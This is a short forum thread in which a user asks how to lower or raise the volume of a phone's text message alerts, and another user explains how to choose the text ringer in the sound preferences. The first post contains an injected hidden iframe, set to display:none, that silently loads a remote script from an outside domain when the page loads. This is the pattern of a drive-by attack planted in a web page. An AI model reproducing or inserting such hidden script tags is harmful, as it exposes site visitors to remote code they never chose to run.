Different volume for text messages?

I receive tons of text messages, and sometimes IŽll be somewhere where the normal sound will be too loud or inadequate. Does anyone know if it can be changed? IŽve tried the options in Preferences but canŽt seem to find the specific part for text messages. <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Setting text ringer

From preferences, go to the "Sounds" page. (If you don't see it from the upper-right pop-up menu, select "Phone prefs" from it. )

From the top three choices, select "type."

I'm not sure of the difference between "page" and "text." It's probably subtle. Just set "page," "text" and "web alerts" to the ringer of your choice. (I recommend "Intensify.")

If that doesn't work, I don't know what's going on.

Thanks, I already did that. What I would like is for some way to adjust the volume of the text ringer to be lower or higher. It seems to be fixed and independent of the main ringer. Maybe when they upgrade the software theyŽll incorporate that function.
